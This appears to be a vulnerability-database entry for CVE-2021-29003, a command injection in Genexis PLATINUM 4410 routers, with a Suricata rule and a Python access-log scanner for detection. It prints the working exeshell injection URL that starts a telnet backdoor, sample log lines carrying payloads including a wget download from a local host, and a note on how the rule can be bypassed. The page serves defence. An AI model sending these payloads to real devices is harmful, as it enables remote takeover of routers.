CVE-2021-29003
published 2021-04-13

Priority: P1 · 88
Severity: critical · 9.8 (CVSS 3.1)
Vector: AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
Tags: ITW · Exploit · VulnCheck KEV
Exploited in the wild
EPSS: 45.42% (98.6th percentile)
Genexis PLATINUM 4410 2.1 P4410-V2-1.28 devices allow remote attackers to execute arbitrary code via shell metacharacters to sys_config_valid.xgi, as demonstrated by the sys_config_valid.xgi?exeshell=%60telnetd%20%26%60 URI.

Affected

1 range
Vendor    Product                  Version range   Fixed in
genexis   platinum_4410_firmware   (none listed)   (none listed)

Detection & IOCs (extracted from sources)

url: http://x.x.x.x/sys_config_valid.xgi?exeshell=%60telnetd%20%26%60
path: /sys_config_valid.xgi
suricata (ET SID 2033758; the `alert http` protocol keyword and the http.method / http.uri sticky buffers are Suricata syntax, so load it in Suricata rather than Snort)
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Genexis PLATINUM 4410 Command Injection Inbound (CVE-2021-29003)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/sys_config_valid.xgi?exeshell="; fast_pattern; pcre:"/^(?:\x3b|\x0a|\x26|\x60|\x7C|\x24)/R"; reference:cve,2021-29003; classtype:attempted-admin; sid:2033758; rev:1; metadata:attack_target Server, created_at 2021_08_22, cve CVE_2021_29003, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, updated_at 2021_08_22, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
  • Match inbound HTTP GET requests whose URI begins with /sys_config_valid.xgi?exeshell=; the exeshell query parameter is the injection point for the shell-metacharacter command injection.
  • After the URI match, the relative, anchored pcre inspects only the first character of the exeshell value and fires on a semicolon (0x3b), newline (0x0a), ampersand (0x26), backtick (0x60), pipe (0x7C) or dollar sign (0x24). A value that starts with a benign character before the metacharacter (for example exeshell=a;...) does not trigger this rule, and whether a percent-encoded metacharacter such as %60 matches depends on the sensor's URI normalization, so pair the rule with log review of every external request to this path.
  • The demonstrated payload wraps the command in URL-encoded backticks and backgrounds it (%60telnetd%20%26%60 decodes to `telnetd &`), leaving a telnet daemon running on the device as a backdoor; any reachable exeshell value can be substituted for it.
  • The vulnerability is confirmed only on firmware 2.1 P4410-V2-1.28; other versions are not confirmed affected.
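The rule above only sees live traffic; the same logic is easy to run retrospectively over web-server access logs. The following Python script is an added example written for this page (it is not the vendor's, Emerging Threats' or this site's code): it parses Common Log Format lines, locates requests to /sys_config_valid.xgi, percent-decodes the exeshell value, and reports both what ET SID 2033758 would fire on (GET plus a leading metacharacter) and the broader "metacharacter anywhere in the value" case the anchored pcre misses. The log lines, the 10.0.0.x addresses and the x.sh download are constructed for the example.

```python
import re
from urllib.parse import urlsplit, unquote

# Injection point named in the advisory and the ET rule.
TARGET_PATH = "/sys_config_valid.xgi"
TARGET_PARAM = "exeshell"

# Shell metacharacters the ET pcre checks for: ; \n & ` | $
METACHARS = frozenset(";\n&`|$")

# Constructed sample access-log lines (Common Log Format). Hosts, timestamps
# and the x.sh download are made up for this example.
SAMPLE_LOG = """\
10.0.0.5 - - [22/Aug/2021:10:01:02 +0000] "GET /sys_config_valid.xgi?exeshell=%60telnetd%20%26%60 HTTP/1.1" 200 512
10.0.0.6 - - [22/Aug/2021:10:01:03 +0000] "GET /sys_config_valid.xgi?exeshell=;wget%20http://10.0.0.9/x.sh HTTP/1.1" 200 512
10.0.0.7 - - [22/Aug/2021:10:01:04 +0000] "GET /sys_config_valid.xgi?exeshell=reboot HTTP/1.1" 200 512
10.0.0.8 - - [22/Aug/2021:10:01:05 +0000] "GET /index.html HTTP/1.1" 200 2048
10.0.0.9 - - [22/Aug/2021:10:01:06 +0000] "POST /sys_config_valid.xgi?exeshell=%60id%60 HTTP/1.1" 200 512
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*"'
)


def exeshell_value(query):
    """Return the percent-decoded exeshell value, or None if the parameter is absent.

    The query is split on '&' before decoding so that an encoded %26 inside the
    payload (as in the advisory's %60telnetd%20%26%60) stays part of the value.
    """
    for pair in query.split("&"):
        name, _, raw = pair.partition("=")
        if name == TARGET_PARAM:
            return unquote(raw)
    return None


def classify_request(method, uri):
    """Classify one request; None if it does not reach the injection point."""
    parts = urlsplit(uri)
    if parts.path != TARGET_PATH:
        return None
    value = exeshell_value(parts.query)
    if value is None:
        return None
    # What SID 2033758 fires on: GET, the target path, and a metacharacter as
    # the very first character of the exeshell value.
    leading = bool(value) and value[0] in METACHARS
    # Broader check: a metacharacter anywhere in the value. This catches
    # exeshell=a;telnetd, which the rule's anchored pcre would not.
    anywhere = any(c in METACHARS for c in value)
    return {
        "method": method,
        "exeshell": value,
        "sid_2033758": method == "GET" and leading,
        "metachar_anywhere": anywhere,
    }


def scan_log(text):
    """Return one record per logged request that carries an exeshell parameter."""
    records = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        result = classify_request(m["method"], m["uri"])
        if result is not None:
            result["src"] = m["src"]
            result["ts"] = m["ts"]
            records.append(result)
    return records


if __name__ == "__main__":
    for r in scan_log(SAMPLE_LOG):
        flag = "RULE" if r["sid_2033758"] else ("META" if r["metachar_anywhere"] else "-")
        print(f'{flag:4} {r["src"]:10} {r["method"]:4} exeshell={r["exeshell"]!r}')
```

The script decodes the value itself rather than relying on the sensor's URI normalization, so the encoded and unencoded forms of the same payload are classified identically; the plain `reboot` request is still reported, because any external request to this parameter is worth a look even when no metacharacter is present.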

CVSS provenance

Source      Version   Score   Severity   Vector
nvd         v3.1      9.8     CRITICAL   CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd         v2.0      7.5     HIGH       AV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck   -         9.8     CRITICAL   -